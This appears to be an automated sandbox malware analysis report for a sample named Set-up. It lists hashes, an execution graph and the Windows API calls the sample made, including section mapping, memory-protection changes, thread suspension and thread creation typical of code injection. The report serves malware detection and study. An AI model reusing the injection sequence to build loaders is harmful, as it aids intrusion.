                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:0.8%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:36.2%
                                                                                                                                                  Signature Coverage:24.8%
                                                                                                                                                  Total number of Nodes:254
                                                                                                                                                  Total number of Limit Nodes:25
                                                                                                                                                  execution_graph 69067 46d354 GetVersion 69090 46e5e6 HeapCreate 69067->69090 69069 46d3b2 69070 46d3be 69069->69070 69102 46d469 8 API calls ctype 69069->69102 69103 46de9c 37 API calls 69070->69103 69073 46d3c4 69074 46d3cf 69073->69074 69104 46d469 8 API calls ctype 69073->69104 69105 46f857 34 API calls ctype 69074->69105 69077 46d3d9 GetCommandLineA 69106 470656 37 API calls ctype 69077->69106 69079 46d3e9 69107 470409 49 API calls ctype 69079->69107 69081 46d3f3 69108 470350 48 API calls ctype 69081->69108 69083 46d3f8 69109 4052b1 207 API calls 2 library calls 69083->69109 69085 46d419 69110 46e275 32 API calls 69085->69110 69087 46d425 69111 4701d8 36 API calls 69087->69111 69089 46d436 69091 46e606 69090->69091 69092 46e63c 69090->69092 69112 46e49e 57 API calls 69091->69112 69092->69069 69094 46e60b 69095 46e615 69094->69095 69096 46e622 69094->69096 69113 46e643 HeapAlloc 69095->69113 69098 46e63f 69096->69098 69114 46f18a 5 API calls ctype 69096->69114 69098->69069 69099 46e61f 69099->69098 69101 46e630 HeapDestroy 69099->69101 69101->69092 69103->69073 69105->69077 69106->69079 69107->69081 69108->69083 69109->69085 69110->69087 69111->69089 69112->69094 69113->69099 69114->69099 69115 46c3f5 69118 46c407 69115->69118 69119 46c404 69118->69119 69120 46c40e ctype 69118->69120 69120->69119 69122 46c433 69120->69122 69123 46c460 69122->69123 69125 46c4a3 69122->69125 69129 46c48e 69123->69129 69140 46e0ea 29 API calls ctype 69123->69140 69128 46c4c5 69125->69128 69125->69129 69126 46c476 69141 46e9df 5 API calls ctype 69126->69141 69127 46c512 RtlAllocateHeap 69131 46c495 69127->69131 69143 46e0ea 29 API calls ctype 69128->69143 69129->69127 69129->69131 69131->69120 69133 46c481 69142 46c49a LeaveCriticalSection ctype 69133->69142 69134 46c4cc 69144 46f482 6 API calls ctype 69134->69144 69137 46c4df 69145 46c4f9 LeaveCriticalSection ctype 69137->69145 69139 46c4ec 69139->69129 69139->69131 69140->69126 69141->69133 69142->69129 69143->69134 69144->69137 69145->69139 69146 680461 69147 68046f 69146->69147 69162 680db1 69147->69162 69149 6809fa 69150 680607 GetPEB 69152 680684 69150->69152 69151 6805c2 69151->69149 69151->69150 69165 680b71 69152->69165 69155 6806e5 CreateThread 69156 6806bd 69155->69156 69175 680a21 GetPEB 69155->69175 69161 6808f5 69156->69161 69173 681071 GetPEB 69156->69173 69158 6809e5 TerminateProcess 69158->69149 69159 680b71 4 API calls 69159->69161 69160 68073f 69160->69159 69160->69161 69161->69158 69163 680dbe 69162->69163 69174 680dd1 GetPEB 69162->69174 69163->69151 69166 680b87 CreateToolhelp32Snapshot 69165->69166 69168 6806b7 69166->69168 69169 680bbe Thread32First 69166->69169 69168->69155 69168->69156 69169->69168 69170 680be5 69169->69170 69170->69168 69171 680c1c Wow64SuspendThread 69170->69171 69172 680c46 CloseHandle 69170->69172 69171->69172 69172->69170 69173->69160 69174->69163 69178 680a7a 69175->69178 69176 680ada CreateThread 69176->69178 69179 681251 69176->69179 69177 680b27 69178->69176 69178->69177 69182 6cca16 69179->69182 69183 6cca3b 69182->69183 69184 6ccb25 69182->69184 69218 6cf298 69183->69218 69194 6cdcf1 69184->69194 69187 681256 69188 6cca53 69188->69187 69189 6cf298 LoadLibraryA 69188->69189 69190 6cca95 69189->69190 69191 6cf298 LoadLibraryA 69190->69191 69192 6ccab1 69191->69192 69193 6cf298 LoadLibraryA 69192->69193 69193->69187 69195 6cf298 LoadLibraryA 69194->69195 69196 6cdd14 69195->69196 69197 6cf298 LoadLibraryA 69196->69197 69198 6cdd2c 69197->69198 69199 6cf298 LoadLibraryA 69198->69199 69200 6cdd4a 69199->69200 69201 6cdd5f VirtualAlloc 69200->69201 69210 6cdd73 69200->69210 69203 6cdd8d 69201->69203 69201->69210 69202 6cf298 LoadLibraryA 69205 6cde0b 69202->69205 69203->69202 69215 6cdfe6 69203->69215 69204 6cf298 LoadLibraryA 69206 6cde61 69204->69206 69205->69206 69205->69210 69222 6cf09f 69205->69222 69206->69204 69209 6cdec3 69206->69209 69206->69215 69208 6ce0a4 VirtualFree 69208->69210 69209->69215 69217 6cdf25 69209->69217 69250 6cce81 LoadLibraryA 69209->69250 69210->69187 69212 6cdf0e 69212->69215 69251 6ccf7c LoadLibraryA 69212->69251 69215->69208 69216 6ce043 69215->69216 69216->69216 69217->69215 69226 6ce421 69217->69226 69219 6cf2af 69218->69219 69220 6cf2d6 69219->69220 69254 6cd39d LoadLibraryA 69219->69254 69220->69188 69223 6cf0b4 69222->69223 69224 6cf12a LoadLibraryA 69223->69224 69225 6cf134 69223->69225 69224->69225 69225->69205 69227 6ce45c 69226->69227 69228 6ce4a3 NtCreateSection 69227->69228 69229 6ce4c8 69227->69229 69249 6cead0 69227->69249 69228->69229 69228->69249 69230 6ce55d NtMapViewOfSection 69229->69230 69229->69249 69239 6ce57d 69230->69239 69231 6ce804 69232 6ce8a6 VirtualAlloc 69231->69232 69234 6cf09f LoadLibraryA 69231->69234 69238 6ce8a2 69231->69238 69252 6cf13d LoadLibraryA 69231->69252 69237 6ce8e8 69232->69237 69233 6cf09f LoadLibraryA 69233->69239 69234->69231 69235 6ce999 VirtualProtect 69236 6cea64 VirtualProtect 69235->69236 69243 6ce9b9 69235->69243 69248 6cea93 69236->69248 69237->69235 69245 6ce986 NtMapViewOfSection 69237->69245 69237->69249 69238->69232 69239->69231 69239->69233 69240 6cf13d LoadLibraryA 69239->69240 69239->69249 69240->69239 69241 6cebe6 CreateThread 69241->69249 69243->69236 69246 6cea3e VirtualProtect 69243->69246 69245->69235 69245->69249 69246->69243 69247 6cebde 69247->69241 69247->69249 69248->69247 69248->69249 69253 6cee52 LoadLibraryA 69248->69253 69249->69215 69250->69212 69251->69217 69252->69231 69253->69247 69254->69219 69255 43c788 69256 43c792 __EH_prolog 69255->69256 69257 43c7d5 69256->69257 69260 43c7e8 69256->69260 69361 43cc49 29 API calls 2 library calls 69257->69361 69259 43c7e1 69263 43cbbd 69260->69263 69282 407095 30 API calls ctype 69260->69282 69369 43cc49 29 API calls 2 library calls 69263->69369 69265 43cb20 69368 43cc49 29 API calls 2 library calls 69265->69368 69269 4401e6 CharPrevExA 69278 43c84d 69269->69278 69270 43ca0f 69363 43ce3d 29 API calls 2 library calls 69270->69363 69272 43ce3d 29 API calls 69272->69278 69273 43cb11 69367 43ce3d 29 API calls 2 library calls 69273->69367 69276 43ca76 69364 43ce3d 29 API calls 2 library calls 69276->69364 69278->69263 69278->69265 69278->69269 69278->69270 69278->69272 69278->69273 69278->69276 69279 43cab9 69278->69279 69281 43c8c3 69278->69281 69283 43ccea 30 API calls __EH_prolog 69278->69283 69284 43bb49 69278->69284 69362 43ee7c 30 API calls 2 library calls 69278->69362 69365 43ce3d 29 API calls 2 library calls 69279->69365 69366 43cc49 29 API calls 2 library calls 69281->69366 69282->69278 69283->69278 69286 43bb53 __EH_prolog 69284->69286 69297 43bbf2 69286->69297 69370 407095 30 API calls ctype 69286->69370 69288 43bbdd 69288->69297 69371 43ff6e 30 API calls __EH_prolog 69288->69371 69289 43bca0 69290 43bde0 69289->69290 69293 43bfe1 69289->69293 69295 43bcd9 69289->69295 69291 43bde9 69290->69291 69292 43be3e 69290->69292 69323 43bd50 69291->69323 69378 407095 30 API calls ctype 69291->69378 69292->69323 69379 407095 30 API calls ctype 69292->69379 69293->69297 69298 43c050 69293->69298 69299 43c0fa 69293->69299 69316 43c097 69293->69316 69295->69297 69295->69323 69377 407095 30 API calls ctype 69295->69377 69297->69278 69392 407095 30 API calls ctype 69298->69392 69300 43c102 69299->69300 69301 43c124 69299->69301 69394 407095 30 API calls ctype 69300->69394 69305 43c154 69301->69305 69306 43c12a 69301->69306 69308 43c176 69305->69308 69309 43c15a 69305->69309 69395 407095 30 API calls ctype 69306->69395 69311 43c19c 69308->69311 69312 43c17c 69308->69312 69397 407095 30 API calls ctype 69309->69397 69311->69316 69399 40ba2e 31 API calls __EH_prolog 69311->69399 69372 407095 30 API calls ctype 69312->69372 69313 43c057 69313->69297 69313->69316 69393 43d07b 30 API calls __EH_prolog 69313->69393 69314 43c134 69314->69313 69396 44dcd0 30 API calls 69314->69396 69315 43c161 69315->69313 69398 43ba82 30 API calls __EH_prolog 69315->69398 69316->69297 69332 43c29f 69316->69332 69347 43c2d1 69316->69347 69400 407095 30 API calls ctype 69316->69400 69318 43c186 69318->69313 69373 452f00 69318->69373 69323->69293 69323->69297 69325 43bef7 69323->69325 69326 43bee9 SysFreeString 69323->69326 69380 4061d7 30 API calls ctype 69325->69380 69326->69297 69329 43bf0a 69331 43bf54 69329->69331 69333 43bf1a 69329->69333 69330 43c28c 69330->69332 69401 40c5e2 VirtualAlloc RaiseException __EH_prolog ctype 69330->69401 69385 402dc9 30 API calls 69331->69385 69332->69347 69402 458220 30 API calls ctype 69332->69402 69381 402dc9 30 API calls 69333->69381 69338 43bf5f 69386 4079d2 31 API calls 69338->69386 69339 43bf25 69382 4079d2 31 API calls 69339->69382 69342 43bf70 69387 4074ba 30 API calls 69342->69387 69343 43bf36 69383 4074ba 30 API calls 69343->69383 69346 43bf7d 69388 4070bb 29 API calls ctype 69346->69388 69347->69297 69403 43ff6e 30 API calls __EH_prolog 69347->69403 69348 43bf43 69384 4070bb 29 API calls ctype 69348->69384 69352 43bf4b 69389 4070bb 29 API calls ctype 69352->69389 69354 43bf91 69355 43bfd2 69354->69355 69356 43bfa9 69354->69356 69391 4070bb 29 API calls ctype 69355->69391 69390 4070bb 29 API calls ctype 69356->69390 69359 43bfae SysFreeString 69359->69297 69360 43bfd7 SysFreeString 69360->69293 69361->69259 69362->69278 69363->69281 69364->69281 69365->69281 69366->69259 69367->69265 69368->69259 69369->69259 69370->69288 69371->69289 69372->69318 69374 452f19 69373->69374 69375 45354b VirtualAlloc 69374->69375 69376 453583 69375->69376 69376->69313 69377->69323 69378->69323 69379->69323 69380->69329 69381->69339 69382->69343 69383->69348 69384->69352 69385->69338 69386->69342 69387->69346 69388->69352 69389->69354 69390->69359 69391->69360 69392->69313 69393->69316 69394->69313 69395->69314 69396->69313 69397->69315 69398->69313 69399->69313 69400->69330 69401->69332 69402->69347 69403->69297

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 006CE421 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 006CE4BA
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 006CE562
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 006CE8D6
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 006CE98B
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 006CE9A8
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 006CEA4B
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 006CEA7E
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 006CEBEF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction ID: 2958dca581d42874332fb96406cb6ca6d0b05c2e9a19e032086f2798d70bdd9f
                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction Fuzzy Hash: 8F426871604341AFDB24CF24C844FAABBFAEF88714F14492DF9959B241D772E845CB61
                                                                                                                                                  Function 00680461 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 399threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 187 680461-6805c9 call 680a11 call 681011 call 6811c1 call 680db1 196 6809fa-6809fd 187->196 197 6805cf-6805d6 187->197 198 6805e1-6805e5 197->198 199 680607-680682 GetPEB 198->199 200 6805e7-680605 call 680f31 198->200 202 68068d-680691 199->202 200->198 204 6806a9-6806bb call 680b71 202->204 205 680693-6806a7 202->205 210 6806bd-6806e3 204->210 211 6806e5-680706 CreateThread 204->211 205->202 212 680709-68070d 210->212 211->212 214 6809ce-6809f8 TerminateProcess 212->214 215 680713-680746 call 681071 212->215 214->196 215->214 219 68074c-68079b 215->219 221 6807a6-6807ac 219->221 222 6807ae-6807b4 221->222 223 6807f4-6807f8 221->223 224 6807b6-6807c5 222->224 225 6807c7-6807cb 222->225 226 6807fe-68080b 223->226 227 6808c6-6809b9 call 680b71 call 680a11 call 681011 223->227 224->225 228 6807cd-6807db 225->228 229 6807f2 225->229 230 680816-68081c 226->230 253 6809bb 227->253 254 6809be-6809c8 227->254 228->229 231 6807dd-6807ef 228->231 229->221 234 68084c-68084f 230->234 235 68081e-68082c 230->235 231->229 239 680852-680859 234->239 237 68084a 235->237 238 68082e-68083d 235->238 237->230 238->237 242 68083f-680848 238->242 239->227 240 68085b-680864 239->240 240->227 244 680866-680876 240->244 242->234 246 680881-68088d 244->246 248 6808be-6808c4 246->248 249 68088f-6808bc 246->249 248->239 249->246 253->254 254->214
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00680704
                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 006809F8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                  • String ID: "|/$RjBS$my
                                                                                                                                                  • API String ID: 1197810419-1423027040
                                                                                                                                                  • Opcode ID: df02495dd7b73c105367578076f9cd0b13d243c5a6e8e2831a5ebfb3fbdde46d
                                                                                                                                                  • Instruction ID: c69ba20fe533e08279265e4cd33f42a2cb67308cac4dcc76317fde7cd924f2dc
                                                                                                                                                  • Opcode Fuzzy Hash: df02495dd7b73c105367578076f9cd0b13d243c5a6e8e2831a5ebfb3fbdde46d
                                                                                                                                                  • Instruction Fuzzy Hash: B012C2B4E00218DFEB14DF98C990BADBBB2FF48304F2086A9D515AB385D7356A85CF54
                                                                                                                                                  Function 00680B71 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 255 680b71-680bb8 CreateToolhelp32Snapshot 258 680c8e-680c91 255->258 259 680bbe-680bdf Thread32First 255->259 260 680c7a-680c89 259->260 261 680be5-680beb 259->261 260->258 262 680c5a-680c74 261->262 263 680bed-680bf3 261->263 262->260 262->261 263->262 264 680bf5-680c14 263->264 264->262 267 680c16-680c1a 264->267 268 680c1c-680c30 Wow64SuspendThread 267->268 269 680c32-680c41 267->269 270 680c46-680c58 CloseHandle 268->270 269->270 270->262
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,006806B7,?,00000001,?,81EC8B55,000000FF), ref: 00680BAF
                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 00680BDB
                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 00680C2E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00680C58
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction ID: 72abda18683505d0fc86204ea39d4b823ef657d00fc1b78507d68f96d65a0f11
                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                  • Instruction Fuzzy Hash: 46410CB5A00108AFEB18DF98C490BEDB7B6EF88300F10C168E6159B7A4DA34AE45CB54
                                                                                                                                                  Function 00452EC0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 752memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 271 452ec0-452f31 call 41f8ac call 470e05 * 2 call 467c47 281 452f36-452f55 271->281 282 452f57 281->282 283 452f5d-452f64 281->283 282->283 283->281 284 452f66-452f6c 283->284 285 452f74 284->285 286 452f6e 284->286 287 452f76 285->287 288 452f7b 285->288 286->285 287->288 289 452f80-452f9d call 470e05 288->289 292 452fa2-452fd3 call 46c864 289->292 293 452f9f 289->293 292->289 296 452fd5-4538eb call 451bb3 call 42e2e0 call 405090 call 445420 call 44a3cd call 468d1c call 45e28d call 430864 call 415d3f call 457f71 call 414269 call 433d8f call 451daa call 412a37 call 463f8c call 4444c3 call 4554d4 call 469ff7 call 467c47 call 444682 call 4667db call 416656 call 43c587 call 442a86 call 458e3a call 430bf9 call 4462eb call 42c0d2 call 43f01c call 4554d4 call 415018 call 45194b call 443ce3 call 40ca28 call 467c47 call 450c77 call 4412f1 call 40c2c7 call 4250a2 call 4229e9 call 45cdc6 call 414788 call 458e3a call 456081 VirtualAlloc call 469ed3 call 422fe6 call 41a4bb call 43b6f0 call 41eab8 call 43b121 call 4302e6 call 435219 call 413a89 call 42ccd8 call 418f74 call 435219 call 43a9ab call 415a18 call 41f9f2 call 430f73 call 433551 call 407019 call 43906a call 451bb3 call 42e8c3 call 40bf8c call 452ced call 41c137 call 44e575 call 445582 call 469ff7 call 4591be call 44e7e4 call 4189d6 call 45cdda call 428fb8 call 44b4b0 292->296 293->292 451 4538ed-4538f1 296->451 452 4538f5-453909 451->452 453 4538f3 451->453 454 45390b 452->454 455 45392a-453944 452->455 453->452 456 453911-453922 454->456 455->451 457 453946-45395c 455->457 456->456 458 453924-453928 456->458 459 453962-45397b 457->459 458->455 459->459 460 45397d-45398b 459->460
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,0004F7B0,-80408061,-F246F074,0043C19A,00000001,?,?,?,?,?), ref: 00453557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: ~Xq]
                                                                                                                                                  • API String ID: 4275171209-3958706757
                                                                                                                                                  • Opcode ID: dc22cf1421f3adba9ca020c33df28a80a644fba2fdc0e032cf26d0cf9e2f9fe2
                                                                                                                                                  • Instruction ID: 23b3846dbbdb6520a492e89359c16462791ec603751c17f034bd391237e9687c
                                                                                                                                                  • Opcode Fuzzy Hash: dc22cf1421f3adba9ca020c33df28a80a644fba2fdc0e032cf26d0cf9e2f9fe2
                                                                                                                                                  • Instruction Fuzzy Hash: 2A325A339283208FD748EF7AEC4A1693662FBE0318746823FD846D7156DB38584287CE
                                                                                                                                                  Function 00452F00 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 738memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 461 452f00-452f12 462 452f19-452f31 call 467c47 461->462 463 452f14 call 470e05 461->463 466 452f36-452f55 462->466 463->462 467 452f57 466->467 468 452f5d-452f64 466->468 467->468 468->466 469 452f66-452f6c 468->469 470 452f74 469->470 471 452f6e 469->471 472 452f76 470->472 473 452f7b 470->473 471->470 472->473 474 452f80-452f9d call 470e05 473->474 477 452fa2-452fd3 call 46c864 474->477 478 452f9f 474->478 477->474 481 452fd5-45386d call 451bb3 call 42e2e0 call 405090 call 445420 call 44a3cd call 468d1c call 45e28d call 430864 call 415d3f call 457f71 call 414269 call 433d8f call 451daa call 412a37 call 463f8c call 4444c3 call 4554d4 call 469ff7 call 467c47 call 444682 call 4667db call 416656 call 43c587 call 442a86 call 458e3a call 430bf9 call 4462eb call 42c0d2 call 43f01c call 4554d4 call 415018 call 45194b call 443ce3 call 40ca28 call 467c47 call 450c77 call 4412f1 call 40c2c7 call 4250a2 call 4229e9 call 45cdc6 call 414788 call 458e3a call 456081 VirtualAlloc call 469ed3 call 422fe6 call 41a4bb call 43b6f0 call 41eab8 call 43b121 call 4302e6 call 435219 call 413a89 call 42ccd8 call 418f74 call 435219 call 43a9ab call 415a18 call 41f9f2 call 430f73 call 433551 call 407019 call 43906a call 451bb3 call 42e8c3 call 40bf8c call 452ced call 41c137 call 44e575 call 445582 call 469ff7 call 4591be call 44e7e4 call 4189d6 call 45cdda call 428fb8 477->481 478->477 633 453872-4538eb call 44b4b0 481->633 636 4538ed-4538f1 633->636 637 4538f5-453909 636->637 638 4538f3 636->638 639 45390b 637->639 640 45392a-453944 637->640 638->637 641 453911-453922 639->641 640->636 642 453946-45395c 640->642 641->641 643 453924-453928 641->643 644 453962-45397b 642->644 643->640 644->644 645 45397d-45398b 644->645
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,0004F7B0,-80408061,-F246F074,0043C19A,00000001,?,?,?,?,?), ref: 00453557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: ~Xq]
                                                                                                                                                  • API String ID: 4275171209-3958706757
                                                                                                                                                  • Opcode ID: 5944918900410707abcbb0052d332923433acbd673e6e78fd571fdbb55364c9b
                                                                                                                                                  • Instruction ID: 9859298c637fecb1f15daa030293847af9db440e6c9cbbc6670a331bb4743b03
                                                                                                                                                  • Opcode Fuzzy Hash: 5944918900410707abcbb0052d332923433acbd673e6e78fd571fdbb55364c9b
                                                                                                                                                  • Instruction Fuzzy Hash: 77324B739283208FD748EF7AEC8A1693662FBE0318746923FD846D7156DB38584687CD
                                                                                                                                                  Function 00680A21 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 646 680a21-680a78 GetPEB 647 680a83-680a87 646->647 648 680a8d-680a98 647->648 649 680b27-680b2e 647->649 651 680a9e-680ab5 648->651 652 680b22 648->652 650 680b39-680b3d 649->650 654 680b4e-680b55 650->654 655 680b3f-680b4c 650->655 656 680ada-680af2 CreateThread 651->656 657 680ab7-680ad8 651->657 652->647 659 680b5e-680b63 654->659 660 680b57-680b59 654->660 655->650 661 680af6-680afe 656->661 657->661 660->659 661->652 663 680b00-680b1d 661->663 663->652
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00680AED
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction ID: dcf51797f9416d24e4deea40688138960a4ba1719607593ea159c88066950d77
                                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2141E774A00208EFDB14DF98C994BAEB7B2FF48314F208698D5156B381C771AE85CF94
                                                                                                                                                  Function 006CF09F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
